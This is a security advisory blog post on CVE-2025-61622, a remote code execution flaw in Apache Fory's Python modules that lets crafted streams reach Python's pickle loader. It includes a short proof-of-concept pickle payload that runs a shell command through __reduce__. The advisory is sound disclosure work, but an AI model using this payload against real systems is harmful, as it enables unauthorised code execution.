← Back to Blog
CriticalCVSS 9.8RCECVE-2025-61622

Published 2025

Python RCE via Unguarded Pickle Fallback in pyfory/pyfury

BugBunny.ai identified a critical deserialization issue in Apache Fory's Python modules (pyfory/pyfury) where unsupported object types fall back to Python's unsafe pickle loader. Crafted data streams from untrusted sources force the pickle fallback, enabling arbitrary code execution.

Responsibly DisclosedView CVE →

Summary

Impact:Arbitrary code execution on deserialization
Vector:Crafted pyfory stream with pickle payload
Affected:pyfory 0.1.0–0.10.3, 0.12.0–0.12.2
Status:Fixed in pyfory 0.10.4, 0.12.3+

Root Cause

When pyfory encounters an object type it doesn't recognize, it falls back to Python's native pickle deserializer. Since pickle can execute arbitrary Python code during deserialization, an attacker can craft a data stream that triggers this fallback with a malicious pickle payload.

Proof of Concept

python
import base64, pickle


class RCE:
    def __reduce__(self):
        return (__import__('os').system, ('touch /tmp/bugbunny-owned',))


print(base64.b64encode(pickle.dumps(RCE())).decode())
# Embed the base64 output in the pyfory stream so the fallback deserializer feeds it to pickle.loads.

Mitigation

  • Upgrade to pyfory 0.10.4 or 0.12.3+ immediately
  • Never deserialize pyfory streams from untrusted sources
  • Implement input validation before deserialization

Credits & Disclosure

Identified by BugBunny.ai and responsibly disclosed to the Apache Fory maintainers.

Reporter: BugBunny.aiCVE-2025-61622
CVE-2025-61622: Apache Fory Pickle RCE | BugBunny.ai | BugBunny.ai